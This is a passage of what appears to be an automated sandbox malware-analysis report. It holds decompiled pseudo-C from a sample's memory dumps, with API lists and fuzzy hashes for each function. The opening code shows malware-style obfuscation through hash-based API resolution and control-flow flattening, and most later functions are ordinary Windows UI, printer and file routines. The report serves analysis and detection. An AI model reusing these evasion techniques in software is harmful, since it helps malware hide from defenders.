                                            													_t100 = E02273F20(0xbb398380);
                                            													_t156 = E02273E80(_t95, _t100, 0x23563937, _t161);
                                            													 *0x227ded0 = _t156;
                                            												}
                                            												_t165 = _t156;
                                            												if(_t156 == 0) {
                                            													_t100 = E02273F20(0xbb398380);
                                            													_t156 = E02273E80(_t95, _t100, 0x23563937, _t165);
                                            													 *0x227ded0 = _t156;
                                            												}
                                            												_t98 = _t156;
                                            												if(_t156 == 0) {
                                            													_t100 = E02273F20(0xbb398380);
                                            													 *0x227ded0 = E02273E80(_t98, _t100, 0x23563937, _t165);
                                            												}
                                            												_t146 =  *0x227dce8; // 0x0
                                            												if(_t146 == 0) {
                                            													_t100 = E02273F20(0xbb398380);
                                            													_t146 = E02273E80(_t98, _t100, 0xb310a228, _t165);
                                            													 *0x227dce8 = _t146;
                                            												}
                                            												_t82 =  *_t146(GetCurrentProcess(), GetCurrentProcess(), GetCurrentProcess(),  &_a40, 0x100000, 1, 0);
                                            												_t149 = _v8;
                                            												_t134 = _v12;
                                            												asm("sbb eax, eax");
                                            												_t37 = ( ~_t82 & 0x069deb97) + 0x1f9eb481;
                                            												_t95 = _v0;
                                            												L2:
                                            												_t161 = _a36;
                                            												while(1) {
                                            													L3:
                                            													_t170 = _t37 - 0x1bec2acf;
                                            													if(_t170 > 0) {
                                            														goto L41;
                                            													}
                                            													goto L4;
                                            												}
                                            												goto L41;
                                            											}
                                            										}
                                            									}
                                            								}
                                            							}
                                            						}
                                            						L60:
                                            						L41:
                                            						__eflags = _t37 - 0x1fc710ef;
                                            						if(__eflags > 0) {
                                            							__eflags = _t37 - 0x263ca018;
                                            							if(_t37 == 0x263ca018) {
                                            								_t100 =  &_a44;
                                            								_t38 = E0227B3A0(_t100,  &_a36);
                                            								asm("sbb eax, eax");
                                            								_t37 = ( ~_t38 & 0x28f9ad68) + 0xa70e03e;
                                            								goto L2;
                                            							} else {
                                            								__eflags = _t37 - 0x336a8da6;
                                            								if(_t37 != 0x336a8da6) {
                                            									break;
                                            								} else {
                                            									_t100 = _t161;
                                            									_t41 = E02271140(_a40);
                                            									_t134 = _a20;
                                            									_t95 = _t41;
                                            									__eflags = _t95;
                                            									_a32 = _t95;
                                            									_t37 =  !=  ? 0x1a44b2a5 : 0x1dedf83c;
                                            									continue;
                                            								}
                                            							}
                                            						} else {
                                            							if(__eflags == 0) {
                                            								_t100 = _t149;
                                            								_t44 = E0227AB50(_t100, _t134,  &_a576);
                                            								_t134 = _a20;
                                            								_t166 = _t166 + 4;
                                            								asm("sbb eax, eax");
                                            								_t37 = ( ~_t44 & 0xf935bf44) + 0x1f9eb481;
                                            								continue;
                                            							} else {
                                            								__eflags = _t37 - 0x1dedf83c;
                                            								if(_t37 == 0x1dedf83c) {
                                            									_t47 =  *0x227dea8;
                                            									__eflags = _t47;
                                            									if(_t47 == 0) {
                                            										_t100 = E02273F20(0xbb398380);
                                            										_t47 = E02273E80(_t95, _t100, 0x97f883e, _t161);
                                            										 *0x227dea8 = _t47;
                                            									}
                                            									_t158 =  *_t47();
                                            									_t49 =  *0x227e1a0;
                                            									__eflags = _t49;
                                            									if(_t49 == 0) {
                                            										_t100 = E02273F20(0xbb398380);
                                            										_t49 = E02273E80(_t95, _t100, 0x26c3f343, _t161);
                                            										 *0x227e1a0 = _t49;
                                            									}
                                            									 *_t49(_t158, 0, _t161);
                                            									_t149 = _a12;
                                            									_t37 = 0xa70e03e;
                                            									_t134 = _a8;
                                            									continue;
                                            								} else {
                                            									__eflags = _t37 - 0x1f9eb481;
                                            									if(_t37 == 0x1f9eb481) {
                                            										_t53 = E02274250(_t95, _a28);
                                            										goto L59;
                                            									} else {
                                            										break;
                                            									}
                                            								}
                                            							}
                                            						}
                                            						goto L60;
                                            					}
                                            					__eflags = _t37 - 0x1c40b504;
                                            				} while (_t37 != 0x1c40b504);
                                            				return _t37;
                                            				goto L60;
                                            			}

                                            APIs
                                            • GetCurrentProcess.KERNEL32(?,00100000,00000001,00000000), ref: 0227A0FB
                                            • GetCurrentProcess.KERNEL32(00000000), ref: 0227A0FE
                                            • GetCurrentProcess.KERNEL32(00000000), ref: 0227A101
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931690638.0000000002271000.00000020.00000001.sdmp, Offset: 02270000, based on PE: true
                                            • Associated: 00000001.00000002.931684475.0000000002270000.00000004.00000001.sdmp
                                            • Associated: 00000001.00000002.931699903.000000000227D000.00000004.00000001.sdmp
                                            • Associated: 00000001.00000002.931707027.0000000002280000.00000002.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2270000_sort.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CurrentProcess
                                            • String ID: 79V#$79V#$79V#$>p
                                            • API String ID: 2050909247-2830606539
                                            • Opcode ID: 94530cec8e20c4a094e87683f953fef4140262891607b14345d7a3698d67aad4
                                            • Instruction ID: 6982bc5ac6c36f95c538a4700fe7e5c6c75db4bb3636f04e67901887edce0285
                                            • Opcode Fuzzy Hash: 94530cec8e20c4a094e87683f953fef4140262891607b14345d7a3698d67aad4
                                            • Instruction Fuzzy Hash: 8531A131E6D3529BCA10EAE4644872F32E7ABC8694F190C59E885DB258DF74DC058BD2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • SetLastError.KERNEL32(0000007F), ref: 022414DB
                                            • SetLastError.KERNEL32(0000007F), ref: 02241507
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931652161.0000000002241000.00000020.00000001.sdmp, Offset: 02241000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2241000_sort.jbxd
                                            Similarity
                                            • API ID: ErrorLast
                                            • String ID:
                                            • API String ID: 1452528299-0
                                            • Opcode ID: 54e2e66beb9ceb88c7045b401b919d665d24cdc9c9fcb598676be2aeaa5585a4
                                            • Instruction ID: e793679fa580244b210716b553b8e472b3e1de9845278527d005c76fab49ca3d
                                            • Opcode Fuzzy Hash: 54e2e66beb9ceb88c7045b401b919d665d24cdc9c9fcb598676be2aeaa5585a4
                                            • Instruction Fuzzy Hash: 0D71C674E20109DFDB08DF98C585BADB7B2FF48304F248598D51AAB345DB74EA91CB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00409509() {
                                            				int _v4;
                                            				int _v8;
                                            				intOrPtr _t7;
                                            				CHAR* _t9;
                                            				WCHAR* _t17;
                                            				int _t20;
                                            				char* _t24;
                                            				int _t32;
                                            				CHAR* _t36;
                                            				WCHAR* _t38;
                                            				void* _t39;
                                            				int _t42;
                                            
                                            				_t7 =  *0x439ed4; // 0x1
                                            				_t32 = 0;
                                            				_t38 = 0;
                                            				_t36 = 0;
                                            				if(_t7 != 0) {
                                            					if(_t7 != 1) {
                                            						if(_t7 != 2) {
                                            							L27:
                                            							return 0;
                                            						}
                                            						L18:
                                            						if(_t36 != _t32) {
                                            							L20:
                                            							_t9 = _t36;
                                            							if( *_t36 == _t32) {
                                            								L23:
                                            								_t41 = _t9 - _t36 + 1;
                                            								_t39 = E00405667(_t9 - _t36 + 1);
                                            								if(_t39 != _t32) {
                                            									E00405700(_t39, _t36, _t41);
                                            								} else {
                                            									_t39 = 0;
                                            								}
                                            								FreeEnvironmentStringsA(_t36);
                                            								return _t39;
                                            							} else {
                                            								goto L21;
                                            							}
                                            							do {
                                            								do {
                                            									L21:
                                            									_t9 =  &(_t9[1]);
                                            								} while ( *_t9 != _t32);
                                            								_t9 =  &(_t9[1]);
                                            							} while ( *_t9 != _t32);
                                            							goto L23;
                                            						}
                                            						_t36 = GetEnvironmentStrings();
                                            						if(_t36 == _t32) {
                                            							goto L27;
                                            						}
                                            						goto L20;
                                            					}
                                            					L6:
                                            					if(_t38 != _t32) {
                                            						L8:
                                            						_t17 = _t38;
                                            						if( *_t38 == _t32) {
                                            							L11:
                                            							_t20 = (_t17 - _t38 >> 1) + 1;
                                            							_v4 = _t20;
                                            							_t42 = WideCharToMultiByte(_t32, _t32, _t38, _t20, _t32, _t32, _t32, _t32);
                                            							if(_t42 != _t32) {
                                            								_t24 = E00405667(_t42);
                                            								_v8 = _t24;
                                            								if(_t24 != _t32) {
                                            									if(WideCharToMultiByte(_t32, _t32, _t38, _v4, _t24, _t42, _t32, _t32) == 0) {
                                            										E004062E0(_v8);
                                            										_v8 = _t32;
                                            									}
                                            									_t32 = _v8;
                                            								}
                                            							}
                                            							FreeEnvironmentStringsW(_t38);
                                            							return _t32;
                                            						} else {
                                            							goto L9;
                                            						}
                                            						do {
                                            							do {
                                            								L9:
                                            								_t17 =  &(_t17[1]);
                                            							} while ( *_t17 != _t32);
                                            							_t17 =  &(_t17[1]);
                                            						} while ( *_t17 != _t32);
                                            						goto L11;
                                            					}
                                            					_t38 = GetEnvironmentStringsW();
                                            					if(_t38 == _t32) {
                                            						goto L27;
                                            					}
                                            					goto L8;
                                            				}
                                            				_t38 = GetEnvironmentStringsW();
                                            				if(_t38 == 0) {
                                            					_t36 = GetEnvironmentStrings();
                                            					if(_t36 == 0) {
                                            						goto L27;
                                            					}
                                            					 *0x439ed4 = 2;
                                            					goto L18;
                                            				}
                                            				 *0x439ed4 = 1;
                                            				goto L6;
                                            			}

                                            APIs
                                            • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,0040641E), ref: 00409524
                                            • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,0040641E), ref: 00409538
                                            • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,0040641E), ref: 00409564
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,0040641E), ref: 0040959C
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,0040641E), ref: 004095BE
                                            • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,0040641E), ref: 004095D7
                                            • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,0040641E), ref: 004095EA
                                            • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00409628
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                            • String ID:
                                            • API String ID: 1823725401-0
                                            • Opcode ID: c300a98435790b0a112db5af198a1087b81f0d641cfac9594a12296cbced713a
                                            • Instruction ID: ef1768683ce44c7a55569678311ee6e18f6548819425519884899f5cccb4810e
                                            • Opcode Fuzzy Hash: c300a98435790b0a112db5af198a1087b81f0d641cfac9594a12296cbced713a
                                            • Instruction Fuzzy Hash: 023142B35052147FD7313F765C9483BB79CE649358B59093BF482E32C2EA3A8C4286AD
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 86%
                                            			E0041518D(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct tagRECT* _a20, intOrPtr _a24, intOrPtr _a28) {
                                            				int _v8;
                                            				intOrPtr _v12;
                                            				int _v16;
                                            				int _v20;
                                            				struct tagRECT _v36;
                                            				void* _v40;
                                            				void* __ebp;
                                            				int _t56;
                                            				intOrPtr* _t57;
                                            				signed short _t62;
                                            				void* _t63;
                                            				void* _t67;
                                            				intOrPtr* _t80;
                                            				signed int _t83;
                                            				struct HWND__* _t86;
                                            				void* _t87;
                                            
                                            				_t67 = __ecx;
                                            				_v8 = 0;
                                            				_v12 = _a28;
                                            				_v16 = 0;
                                            				_v20 = 0;
                                            				if(_a24 == 0) {
                                            					GetClientRect( *(__ecx + 0x1c),  &_v36);
                                            				} else {
                                            					asm("movsd");
                                            					asm("movsd");
                                            					asm("movsd");
                                            					asm("movsd");
                                            				}
                                            				if(_a16 == 1) {
                                            					_v40 = _v40 & 0x00000000;
                                            				} else {
                                            					_v40 = BeginDeferWindowPos(8);
                                            				}
                                            				_t56 = GetTopWindow( *(_t67 + 0x1c));
                                            				_t86 = _t56;
                                            				while(_t86 != 0) {
                                            					_t62 = GetDlgCtrlID(_t86);
                                            					_push(_t86);
                                            					_t83 = _t62 & 0x0000ffff;
                                            					_t63 = E00413767();
                                            					if(_t83 != _a12) {
                                            						if(_t83 >= _a4 && _t83 <= _a8 && _t63 != 0) {
                                            							SendMessageA(_t86, 0x361, 0,  &_v40);
                                            						}
                                            					} else {
                                            						_v8 = _t86;
                                            					}
                                            					_t56 = GetWindow(_t86, 2);
                                            					_t86 = _t56;
                                            				}
                                            				if(_a16 != 1) {
                                            					if(_a12 != 0 && _v8 != 0) {
                                            						_t57 = E00413740(_t87, _v8);
                                            						if(_a16 == 2) {
                                            							_t80 = _a20;
                                            							_v36.left = _v36.left +  *_t80;
                                            							_v36.top = _v36.top +  *((intOrPtr*)(_t80 + 4));
                                            							_v36.right = _v36.right -  *((intOrPtr*)(_t80 + 8));
                                            							_v36.bottom = _v36.bottom -  *((intOrPtr*)(_t80 + 0xc));
                                            						}
                                            						 *((intOrPtr*)( *_t57 + 0x60))( &_v36, 0);
                                            						_t56 = E004152C7( &_v40, _v8,  &_v36);
                                            					}
                                            					if(_v40 != 0) {
                                            						_t56 = EndDeferWindowPos(_v40);
                                            					}
                                            				} else {
                                            					if(_a28 == 0) {
                                            						_t56 = _a20;
                                            						 *((intOrPtr*)(_t56 + 8)) = _v20;
                                            						 *((intOrPtr*)(_t56 + 4)) = 0;
                                            						 *_t56 = 0;
                                            						 *((intOrPtr*)(_t56 + 0xc)) = _v16;
                                            					} else {
                                            						_t56 = CopyRect(_a20,  &_v36);
                                            					}
                                            				}
                                            				return _t56;
                                            			}

                                            APIs
                                            • GetClientRect.USER32 ref: 004151C0
                                            • BeginDeferWindowPos.USER32 ref: 004151CE
                                            • GetTopWindow.USER32(?), ref: 004151E0
                                            • GetDlgCtrlID.USER32 ref: 004151EF
                                            • SendMessageA.USER32(00000000,00000361,00000000,00000000), ref: 00415221
                                            • GetWindow.USER32(00000000,00000002), ref: 0041522A
                                            • CopyRect.USER32 ref: 00415246
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: Window$Rect$BeginClientCopyCtrlDeferMessageSend
                                            • String ID:
                                            • API String ID: 3332788312-0
                                            • Opcode ID: e0fe07f5cd80bbe5b935e70b31fd5524e2a365d3d0350172d4ba8dcbf9d76f28
                                            • Instruction ID: 90a1176f2728ed92b7e018f664d1b63403b8a41a4a5cc89754fcf96d7c9d9e63
                                            • Opcode Fuzzy Hash: e0fe07f5cd80bbe5b935e70b31fd5524e2a365d3d0350172d4ba8dcbf9d76f28
                                            • Instruction Fuzzy Hash: D8418D72D00609EFCF15DF94D8848EEB7B5FF49304B1480AAE901A7251C738AE81CFA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 93%
                                            			E0041264E(void* __ecx, char* _a4) {
                                            				void* _v8;
                                            				void* _t15;
                                            				void* _t20;
                                            				void* _t35;
                                            
                                            				_push(__ecx);
                                            				_t35 = __ecx;
                                            				_t15 =  *(__ecx + 0x98);
                                            				if(_t15 != 0) {
                                            					_t15 = lstrcmpA(( *(GlobalLock(_t15) + 2) & 0x0000ffff) + _t16, _a4);
                                            					if(_t15 == 0) {
                                            						_t15 = OpenPrinterA(_a4,  &_v8, 0);
                                            						if(_t15 != 0) {
                                            							_t18 =  *(_t35 + 0x94);
                                            							if( *(_t35 + 0x94) != 0) {
                                            								E0041A92B(_t18);
                                            							}
                                            							_t20 = GlobalAlloc(0x42, DocumentPropertiesA(0, _v8, _a4, 0, 0, 0));
                                            							 *(_t35 + 0x94) = _t20;
                                            							if(DocumentPropertiesA(0, _v8, _a4, GlobalLock(_t20), 0, 2) != 1) {
                                            								E0041A92B( *(_t35 + 0x94));
                                            								 *(_t35 + 0x94) = 0;
                                            							}
                                            							_t15 = ClosePrinter(_v8);
                                            						}
                                            					}
                                            				}
                                            				return _t15;
                                            			}

                                            APIs
                                            • GlobalLock.KERNEL32 ref: 0041266E
                                            • lstrcmpA.KERNEL32(?,?), ref: 0041267A
                                            • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 0041268C
                                            • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 004126AF
                                            • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 004126B7
                                            • GlobalLock.KERNEL32 ref: 004126C4
                                            • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 004126D1
                                            • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 004126EF
                                              • Part of subcall function 0041A92B: GlobalFlags.KERNEL32(?), ref: 0041A935
                                              • Part of subcall function 0041A92B: GlobalUnlock.KERNEL32(?,?,?,0042421F,?,?,?,?,0040199F,00437BE8,?,004013A2), ref: 0041A94C
                                              • Part of subcall function 0041A92B: GlobalFree.KERNEL32 ref: 0041A957
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                            • String ID:
                                            • API String ID: 168474834-0
                                            • Opcode ID: 0d019d4b2acfde511ffeb0843ccef9a7e3a2d5da595c8f22555f1064e6ac44b4
                                            • Instruction ID: e892e9459afc7c616b27fd268aebf896f546ff29830f707e5cbc297c1b476139
                                            • Opcode Fuzzy Hash: 0d019d4b2acfde511ffeb0843ccef9a7e3a2d5da595c8f22555f1064e6ac44b4
                                            • Instruction Fuzzy Hash: 4011E771200104BEDB21AB76CD4AEAF7BBDEF85704F00042EF608D1152D7799DA1D728
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 93%
                                            			E0042322D(intOrPtr __ecx) {
                                            				int _v8;
                                            				intOrPtr _v12;
                                            				struct tagRECT _v28;
                                            				intOrPtr _t24;
                                            				intOrPtr _t26;
                                            				int _t35;
                                            				long _t39;
                                            				intOrPtr _t40;
                                            				int _t42;
                                            				void* _t43;
                                            
                                            				_v12 = __ecx;
                                            				_v8 = GetSystemMetrics(6);
                                            				_t39 = GetSystemMetrics(5);
                                            				_t35 = GetSystemMetrics(0x21);
                                            				_t42 = GetSystemMetrics(0x20);
                                            				_v28.top = _v8;
                                            				_t24 =  *0x439c98; // 0x0
                                            				_v28.left = _t39;
                                            				_v28.right = _t24 - _t39;
                                            				_t26 =  *0x439c9c; // 0x0
                                            				_v28.bottom = _t26;
                                            				if((E00416528(_v12) & 0x00040600) != 0) {
                                            					OffsetRect( &_v28, _t42 - _t39, _t35 - _v8);
                                            				}
                                            				_t40 = _v12;
                                            				_push(GetWindowDC( *(_t40 + 0x1c)));
                                            				_t43 = E00419BA2();
                                            				InvertRect( *(_t43 + 4),  &_v28);
                                            				return ReleaseDC( *(_t40 + 0x1c),  *(_t43 + 4));
                                            			}

                                            APIs
                                            • GetSystemMetrics.USER32 ref: 00423241
                                            • GetSystemMetrics.USER32 ref: 00423248
                                            • GetSystemMetrics.USER32 ref: 0042324E
                                            • GetSystemMetrics.USER32 ref: 00423254
                                              • Part of subcall function 00416528: GetWindowLongA.USER32 ref: 00416534
                                            • OffsetRect.USER32(?,00000000,?), ref: 0042328D
                                            • GetWindowDC.USER32(?,?,?,?), ref: 00423299
                                            • InvertRect.USER32(?,?), ref: 004232AE
                                            • ReleaseDC.USER32 ref: 004232BA
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: MetricsSystem$RectWindow$InvertLongOffsetRelease
                                            • String ID:
                                            • API String ID: 2500086165-0
                                            • Opcode ID: ba394ea1607188f933521b8238ab893581fe33d6a53f651306307ae79d27d4b5
                                            • Instruction ID: 7c5e0aa81d449cf31b82ccaaec63d8c78fb3c057318de3585a12a8b43351a0d8
                                            • Opcode Fuzzy Hash: ba394ea1607188f933521b8238ab893581fe33d6a53f651306307ae79d27d4b5
                                            • Instruction Fuzzy Hash: 4A112B72E00218ABCB10DFF9ED4999EBFB8EF44350F104166EA05E3250D775AD41CB94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 88%
                                            			E00418C88(void* __ecx) {
                                            				void* __esi;
                                            				void* _t60;
                                            				CHAR* _t83;
                                            				void* _t95;
                                            				struct _SECURITY_DESCRIPTOR* _t101;
                                            				signed int _t102;
                                            				void* _t120;
                                            				CHAR** _t124;
                                            				void* _t126;
                                            
                                            				E00406520(E00429FC8, _t126);
                                            				_t120 = __ecx;
                                            				_t124 = __ecx + 0x10;
                                            				E00416A77(_t124, _t124);
                                            				if(( *(_t126 + 0xd) & 0x00000010) != 0 && E004182CC( *(_t126 + 8), _t126 - 0x150) != 0) {
                                            					_t83 =  *0x436980; // 0x436994
                                            					 *(_t126 - 0x10) = _t83;
                                            					_t102 = 0;
                                            					_push(_t126 - 0x10);
                                            					 *(_t126 - 4) = 0;
                                            					E00417BF9(_t126,  *(_t126 + 8));
                                            					if(GetDiskFreeSpaceA( *(_t126 - 0x10), _t126 - 0x24, _t126 - 0x20, _t126 - 0x1c, _t126 - 0x28) != 0) {
                                            						_t102 =  *(_t126 - 0x24) *  *(_t126 - 0x20) *  *(_t126 - 0x1c);
                                            					}
                                            					_t91 =  *((intOrPtr*)(_t126 - 0x144));
                                            					_t136 = _t102 -  *((intOrPtr*)(_t126 - 0x144)) + _t91;
                                            					if(_t102 >  *((intOrPtr*)(_t126 - 0x144)) + _t91) {
                                            						_push(1);
                                            						_push( *(_t126 + 8));
                                            						_push(_t126 - 0x14);
                                            						_t95 = E00418BE2(_t136);
                                            						 *(_t126 - 4) = 1;
                                            						E00416B95(_t124, _t126, _t95);
                                            						 *(_t126 - 4) =  *(_t126 - 4) & 0x00000000;
                                            						E00416AEC(_t126 - 0x14);
                                            					}
                                            					 *(_t126 - 4) =  *(_t126 - 4) | 0xffffffff;
                                            					E00416AEC(_t126 - 0x10);
                                            				}
                                            				_t58 =  *_t124;
                                            				if( *((intOrPtr*)( *_t124 - 8)) == 0 || E004177BD(_t120, _t58,  *(_t126 + 0xc),  *((intOrPtr*)(_t126 + 0x10))) == 0) {
                                            					E00416A77(_t124, _t124);
                                            					_t60 = E004177BD(_t120,  *(_t126 + 8),  *(_t126 + 0xc),  *((intOrPtr*)(_t126 + 0x10)));
                                            				} else {
                                            					E00416BE5(_t120 + 0xc,  *(_t126 + 8));
                                            					if(GetFileTime( *(_t120 + 4), _t126 - 0x18, _t126 - 0x30, _t126 - 0x38) != 0) {
                                            						E0041837E(_t126 - 0x150, _t126 - 0x18);
                                            						SetFileTime( *(_t120 + 4), _t126 - 0x18, _t126 - 0x30, _t126 - 0x38);
                                            					}
                                            					 *(_t126 + 0xc) = 0;
                                            					if(GetFileSecurityA( *(_t126 + 8), 4, 0, 0, _t126 + 0xc) != 0) {
                                            						_t101 = E004131DD( *(_t126 + 0xc));
                                            						if(GetFileSecurityA( *(_t126 + 8), 4, _t101,  *(_t126 + 0xc), _t126 + 0xc) != 0) {
                                            							SetFileSecurityA( *_t124, 4, _t101);
                                            						}
                                            						E00413206(_t101);
                                            					}
                                            					_t60 = 1;
                                            				}
                                            				 *[fs:0x0] =  *((intOrPtr*)(_t126 - 0xc));
                                            				return _t60;
                                            			}












                                            APIs
                                            • __EH_prolog.LIBCMT ref: 00418C8D
                                            • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?,?,?), ref: 00418CF4
                                            • GetFileTime.KERNEL32(?,?,?,?,?), ref: 00418D87
                                            • SetFileTime.KERNEL32(?,?,?,?), ref: 00418DB2
                                            • GetFileSecurityA.ADVAPI32(?,00000004,00000000,00000000,?), ref: 00418DCC
                                            • GetFileSecurityA.ADVAPI32(?,00000004,00000000,?,?), ref: 00418DEA
                                            • SetFileSecurityA.ADVAPI32(?,00000004,00000000), ref: 00418DF5
                                              • Part of subcall function 00417BF9: lstrcpynA.KERNEL32(00000000,?,00000104,?,?), ref: 00417C20
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: File$Security$Time$DiskFreeH_prologSpacelstrcpyn
                                            • String ID:
                                            • API String ID: 726943650-0
                                            • Opcode ID: 151eda710a63fa4e8bb76486b1b12dbcba71fe74a8807c483a8701459e66d7e6
                                            • Instruction ID: be22718d3dfdaed04fc9161a777cdf82254a032ef9ddc828293ac01cd1254a92
                                            • Opcode Fuzzy Hash: 151eda710a63fa4e8bb76486b1b12dbcba71fe74a8807c483a8701459e66d7e6
                                            • Instruction Fuzzy Hash: DD513BB2600209AFDF11EFA1DC85EEEBB7CFF04354F00802AF915A6191DB35DA958B64
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 97%
                                            			E00415F1B(intOrPtr* __ecx) {
                                            				struct HWND__* _t45;
                                            				intOrPtr* _t54;
                                            				int _t63;
                                            				signed int _t66;
                                            				intOrPtr _t67;
                                            				intOrPtr* _t78;
                                            				struct tagMSG* _t80;
                                            				void* _t81;
                                            
                                            				_t67 = 1;
                                            				_t78 = __ecx;
                                            				 *((intOrPtr*)(_t81 + 0x18)) = _t67;
                                            				 *(_t81 + 0x14) = 0;
                                            				if(( *(_t81 + 0x28) & 0x00000004) == 0) {
                                            					L2:
                                            					 *((intOrPtr*)(_t81 + 0x10)) = 0;
                                            					L3:
                                            					_t45 = GetParent( *(_t78 + 0x1c));
                                            					 *(_t78 + 0x24) =  *(_t78 + 0x24) | 0x00000018;
                                            					 *(_t81 + 0x1c) = _t45;
                                            					_t80 = E004126FB() + 0x30;
                                            					L4:
                                            					while( *((intOrPtr*)(_t81 + 0x18)) == 0 || PeekMessageA(_t80, 0, 0, 0, 0) != 0) {
                                            						while( *((intOrPtr*)( *((intOrPtr*)(E004126FB())) + 0x5c))() != 0) {
                                            							if( *((intOrPtr*)(_t81 + 0x10)) != 0) {
                                            								_t63 = _t80->message;
                                            								if(_t63 == 0x118 || _t63 == 0x104) {
                                            									E0041668C(_t78, 1);
                                            									UpdateWindow( *(_t78 + 0x1c));
                                            									 *((intOrPtr*)(_t81 + 0x10)) = 0;
                                            								}
                                            							}
                                            							if( *((intOrPtr*)( *_t78 + 0x70))() == 0) {
                                            								 *(_t78 + 0x24) =  *(_t78 + 0x24) & 0xffffffe7;
                                            								return  *((intOrPtr*)(_t78 + 0x2c));
                                            							} else {
                                            								_t54 = E004126FB();
                                            								_push(_t80);
                                            								if( *((intOrPtr*)( *_t54 + 0x64))() != 0) {
                                            									 *((intOrPtr*)(_t81 + 0x18)) = 1;
                                            									 *(_t81 + 0x14) = 0;
                                            								}
                                            								if(PeekMessageA(_t80, 0, 0, 0, 0) != 0) {
